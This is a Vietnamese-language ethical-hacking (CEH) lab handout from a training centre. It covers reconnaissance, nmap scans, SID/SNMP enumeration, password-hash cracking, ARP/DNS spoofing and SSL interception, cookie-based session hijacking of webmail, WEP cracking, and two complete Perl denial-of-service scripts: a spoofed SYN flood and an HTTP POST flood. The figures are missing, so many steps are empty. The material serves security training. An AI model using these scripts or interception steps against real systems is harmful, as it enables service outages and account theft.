tailieuthuchanh ceh

TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com

FOOTPRINTING

I. Domain: 1. Liệt kê các Top Level Domain (TLDs): gTLDs, ccTLDs,…

Truy cập vào link sau: http://www.iana.org/domains/root/db/

2. Whois: Tìm thông tin đăng ký tên miền sau: cehlab.comCách 1: Tìm từng bước

Lưu Hành Nội Bộ 1

http://www.iana.org/domains/root/db/


a. Tìm thông tin nhà đăng ký (Registrar)

Registrar: NAME.COM LLCWHOIS: whois.name.com

Lưu Hành Nội Bộ2


b. Whois:

Cách 2: Tìm tại trang: http://Who.is


http://Who.is/


Liệt kê: thử nghiệm zone transfer:

Kết quả:- 3 (A) record: www, vpn- 2 (MX) record,…

II. IP: 1. Liệt kê 5 RIRs (Regional Internet Registry): http://www.iana.org/numbers/



2. Whois IP:



3. Reverse Domain Lookup: tìm kiếm thông qua các search enginehttp://myipneighbors.com | http://yougetsignal.com


http://yougetsignal.com/

http://myipneighbors.com/


Các thông tin được lấy thông qua cache, nên một số Domain có thể đã chuyển sang vị trí mới. Nên kiểm tra lại trước khi sử dụng.III. Email, URLs, Phone, Fax: - Trích xuất từ website của hệ thống đích: Công cụ: Web Data Extractor



- Tìm qua các search engine: 1st Email Address Spider, mức độ chính xác thấp hơn cách trên.



IV. Trace:

Dùng lệnh tracert trên windows kiểm tra đường đi đến server www.cehlab.comTracert dùng gói tin TTL expired để xác định các node. Kiểm tra cho kết quả bên dưới:

Node thứ 3 trả lời do TTL expired



SCANNING

I. Giới thiệu Protocols: Đọc và ghi nhận các giá trị trong header của 4 protocol sau:1. IP:



2. ICMP:



3. TCP:



4. UDP:



II. Monitoring: 1. Dùng Wireshark theo dõi quá trình gửi và nhận gói ICMP:

Hãy ghi lại các thông tin sau: Ethernet:

- Source MAC:………………………………………..- Destination MAC:…………………………………..- Type:………………………………………………...

IP:- Protocol:…………………………………………….- Identification:……………………………………….

ICMP:- Type:………………………………………………..- Code:……………………………………………….


TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com 2. Phân tích quá trình 3-way handshake TCP:

a. Mở Wiresharkb. Truy cập website nhatnghe.comc. Lọc thông tin theo hướng dẫn bên dưới:

Hãy ghi lại các thông tin TCP Header của 4 packets đầu tiên theo yêu cầu sau:Packet 1:

- Source Port:- Destination Port:- Sequense number:- Acknowledgement number:- Flags:- Window:

Packet 2:- Source Port:- Destination Port:- Sequense number:- Acknowledgement number:- Flags:- Window:

Packet 3:- Source Port:- Destination Port:- Sequense number:- Acknowledgement number:- Flags:- Window:


TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com III. Scanning:

1. IP Protocol: Nmap –sO <IP>

Vd: nmap –sO 192.168.1.200

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-01 11:15 SE Asia Standard Time Nmap scan report for 192.168.1.200 Host is up (0.0018s latency). Not shown: 251 closed protocols PROTOCOL STATE SERVICE 1 open icmp 2 open|filtered igmp 6 open tcp 17 open udp 255 open|filtered unknown MAC Address: 00:12:F0:4E:7B:7B (Intel Corporate) Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds

2. UDP Port: Nmap –sU <IP>

Vd: nmap -sU 192.168.1.200

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-01 11:13 SE Asia Standard Time Nmap scan report for 192.168.1.200 Host is up (0.0010s latency). Not shown: 991 closed ports PORT STATE SERVICE 123/udp open|filtered ntp 137/udp open netbios-ns 138/udp open|filtered netbios-dgm 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 1027/udp open|filtered unknown 1434/udp open|filtered ms-sql-m 3456/udp open|filtered IISrpc-or-vat 4500/udp open|filtered nat-t-ike MAC Address: 00:12:F0:4E:7B:7B (Intel Corporate) Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds

Ghi chú: có thể dùng thêm các tham số sau-reason: chú thích-p <port>: chỉ định port quét-PN: không ping

Trong trường hợp cổng đích đóng, gói tin UDP sẽ được gửi trả về theo giao thức ICMP, xem hình sau:



3. TCP port:Xem bảng tóm tắt sau:



Phân tích các kiểu quét TCP port rồi rút ra kết luận:

a. SYN Scan:

b. NULL Scan:



c. XMAS Scan:

d. ACK Scan:



e. FIN Scan:

f. ILDE Scan:



V. Version Detection:

1. Banner grabbing: dùng Telnet client để lấy banner ứng dụngTelnet <IP> <port>

Vd:Telnet 192.168.1.200 21

2. Dùng nmap với tham số: -sV (theo dõi bằng Wireshark và đưa ra cách thực hiện)

Mặc dù đã thay đổi cổng dịch vụ Remote Desktop (3003) nhưng vẫn có thể xác định được.Kết luận: nên bảo mật trên ứng dụng.

VI. OS Finger Printing:

Nmap –O <IP>



ENUMERATION

I. Null session: 1. Phân tích SID trên Windows:

Tạo tài khoản mới và kiểm tra:



2. Enumeration SID từ 500-2000:

Nhập IP máy mục tiêu:

Kết nối: - Trong trường hợp máy đích là DC cấu hình mặc định có thể sử dụng Null- Nếu là Windows XP, 2003 Station: sử dụng 1 account bất kỳ



Nhập dãy SID cần liệt kê:

SID:500: teo



Sử dụng account bất kỳ để tìm Share resource (ẩn):

II. SNMP:


TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com SNMP là giao thức dùng quản lý các thiết bị, Community string

thông dụng là: Public, Private.

Các thông tin liệt kê: Account, Share, Service,…



Sử dụng MIB Viewer tải FTP MIB trên hệ thống đích:



PASSWORD CRACKING

I. Offline Password cracking:

1. Xây dựng Rainbow Tables: Mở Winrtgen nhấn Add table



Chọn thông số theo hình sau: 4 Tables, LM Hash

2. Trích xuất LM/NTLM Hash: LC5 Password: không có



Password: nhatnghe

Dùng PWDump:



3. Tìm kiếm Password từ Rainbow Tables:

- Mở Ophcrack PWDump file: luu.txt



- Nhấn Table để thêm table vào danh sách:

- Chọn Install:

- Chọn Crack:



II. Online Password cracking: Sử dụng một số giao thức chứng thực trực tiếp để tìm mật khẩu hệ thống đích. Một số giao thức

tiêu biểu: FTP, Telnet, POP3, RDP, …



Chọn Charset:

Kết quả:



SNIFFERS

Môi trường Switch:I. MAC Flooding:

1. Mở Interface LAN Install: Protocol

2. Nhấn Have Disk chọn file: EthDrv.inf

3. Hoàn tất



4. Flooding:

II. ARP Spoofing: (Main in The Middle)

1. Xem hình bên dưới:



2. Sử dụng phần mềm Cain & Abel ARP spoofing:- Máy Victim: xem ARP cache hiện hành

- Máy Attacker: xem MAC address, dùng địa chỉ này để gửi

Mở Cain & Abel Chọn tab Sniff Nhấn +



Danh sách các Host:

Chọn Tab APR nhấn +:

Enable Poisoning:



- Máy Victim:

Truy cập FTP vào xem kết quả:

3. DNS Spoofing:

Chọn: APR-DNS Nhấn +



Nhập theo bên dưới:

-Máy Victim:



4. Sniff và SSL:Máy Victim truy cập vào https://login.yahoo.comCain & Abel tạo Fake Certificate:


https://login.yahoo.com/


Do đây là self-sign Certificate nên không được trust với máy victim Yes



Kết quả:

5. SSLStrip:- Boot bằng Backtrack, gán IP theo lệnh sau:


TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com ifconfig eth0 <IP>route add default gw <GW>echo nameserver <DNS Server> >/etc/resolv.conf

- Cấu hình Redirect:

- ARPSpoofing:

- Kết quả:



Mật khẩu đăng nhập:



SESSION HIJACKING

I. Networking:

1. Client thực hiện Telnet đến Server:

2. Attacker mở Hunt:

- Chọn d a a



Nhập địa chỉ IP: Server+Client

Mở mode relay: s. Trở về menu chính: xx

Nhập: l để xem các kết nối hiện hành:



- Hijack bằng chức năng: a

- Nhấn phím bất kỳ để Hijacking:

Kết quả: Hoàn toàn kiểm soát được kết nối của Client.



II. Application: 1. User đăng nhập Yahoo mail:



2. Dùng kỹ thuật ARP Spoofing + Ferret (hoặc Wireshark) để ghi cookie:

3. Ferret sẽ ghi vào file Hamster.txt:



4. Sử dụng Cookie Editor để add cookie vừa ghi được:

Giao diện Cookie Editor Add:



Nhập 2 Cookie: T & Y (Yahoo), GX (Gmail),…

Truy cập http://mail.yahoo.com để xem kết quả!


http://mail.yahoo.com/


Kết hợp với Hamster:Chạy thêm Hamster, cấu hình proxy cho webbrowser theo thông số sau:

Đặt trang chủ về:



Click vào IP và xem kết quả:



WIRELESS

I. Chuẩn bị: 1. Xem thông tin WLAN Interface:

2. Chuyển Monitor Mode:

3. Kiểm tra: iwconfig



4. Xác định thông tin Access Point:airodump-ng ath0

II. WEP Cracking:1. Sniffer:

2. Chú ý cột Data



3. Data>=10000:

4. Cracking:Aircrack-ng wep-01.cap

Trường hợp không có máy trạm, không có trao đổi trên đường truyền:

2.1. Tạo station:



2.2. Tìm và gửi trả lại gói tin ARP nhằm tăng lưu lượng, dùng cho phương pháp PTW:

Denial of Service

I. Network: SYN FLOOD:

1. Kiểm tra các cổng trước khi thực hiện:



2. Truy cập website:



3. Tạo và gửi SYN:

Xây dựng công cụ SYN Flood bằng Perl:

tra:


#!/usr/bin/perl# Requires perl, Net::RawIP module, and root privileges

use Net::RawIP;

if($#ARGV == 2) { ($src,$dst,$port) = @ARGV; $a = new Net::RawIP; while(1) { $src_port = rand(65534)+1; $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}}); $a->send; }} else { print "./synflooder source_ip destination_ip destination_port\n";}

TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com 4. Kiểm tra:

5. Truy cập lại website:



II. Application: Yêu cầu:

1. Tìm request tối ưu nhất để thực hiện DoS Web Server tại địa chỉ: 192.168.X.250.2. Tùy biến lại nội dung chương trình sau để thực hiện gửi yêu cầu đến Server:


#!/usr/bin/perluse IO::Socket;

$host = "<hostname>";$pth = "<path>";$postit = "<value>";$lg = length $postit;

while(1)my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\nError: $!\n" unless $sock;

print $sock "POST $pth"."HTTP/1.1\n";print $sock "Host: $host\n";print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";print $sock "Referer: $host\n";print $sock "Accept-Language: en-us\n";print $sock "Content-Type: application/x-www-form-urlencoded\n";print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2\n";print $sock "Content-Length: $lg\n\n";print $sock "$postit\n";close($sock);syswrite STDOUT, "DoS...\n";

}

tailieuthuchanh ceh

Documents